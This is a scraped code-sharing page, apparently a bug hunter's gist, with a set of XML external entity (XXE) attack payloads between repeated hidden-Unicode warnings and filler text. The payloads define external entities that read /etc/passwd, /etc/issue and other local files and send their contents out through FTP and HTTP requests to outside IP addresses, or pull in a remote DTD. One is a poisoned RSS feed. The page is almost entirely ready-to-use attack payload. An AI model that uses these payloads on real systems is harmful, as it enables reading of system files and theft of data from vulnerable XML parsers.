This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| asdfadsf |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| asdfasdf |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| asdfasdf |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="ISO-8859-1"?> | |
| <!DOCTYPE roottag [ | |
| <!ENTITY % file SYSTEM "file:////Users/coolboss/Google Drive/BugBounty/confidential/POCs/xxe/xxe-example/test.txt"> | |
| <!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/pranav1hivarekar/41de45f2a16a99d9ec311bbc26e17887/raw/2322ab460a5bc32cf1a9dd1226758d9c0e293773/mynew.dtd"> | |
| %dtd;]> | |
| file:///somefile.txt | |
| file:///etc/environment | |
| file:///etc/issue |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % d SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://139.59.93.254:2121/%d;'>"> | |
| %c; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % p2 "<!ENTITY e1 'pranav123%file;'>"> | |
| %p2; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///etc/issue"> | |
| <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://139.59.74.177/content?%file;'>"> | |
| %p2; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///etc/issue"> | |
| <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://159.89.168.89:90/pranav?%file;'>"> | |
| %p2; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % b SYSTEM "file:///etc/issue"> | |
| <!ENTITY % c "<!ENTITY % rrr SYSTEM 'http://159.89.168.89:90/pranav?%b;'>"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE title [ <!ELEMENT title ANY > | |
| <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
| <channel> | |
| <title>&xxe;</title> | |
| <link>http://example.com/</link> | |
| <description>A blog about things</description> | |
| <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
| <item> |
OlderNewer